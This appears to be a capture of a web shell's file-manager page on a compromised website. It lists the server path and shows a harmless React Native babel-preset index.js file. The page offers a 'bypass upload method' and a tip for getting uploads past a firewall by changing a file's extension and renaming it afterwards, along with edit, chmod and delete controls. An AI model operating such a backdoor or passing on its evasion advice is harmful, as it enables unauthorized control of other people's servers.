Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
uibuilder.cmshelp.dk
httpdocs
node_modules
@react-native
babel-preset
src
File Content:
index.js
/** * Copyright (c) Meta Platforms, Inc. and affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. * * @format * @oncall react_native */ 'use strict'; const main = require('./configs/main'); module.exports = function (babel, options) { return main(options); }; module.exports.getPreset = main.getPreset; module.exports.passthroughSyntaxPlugins = require('./passthrough-syntax-plugins');
Edit
Download
Unzip
Chmod
Delete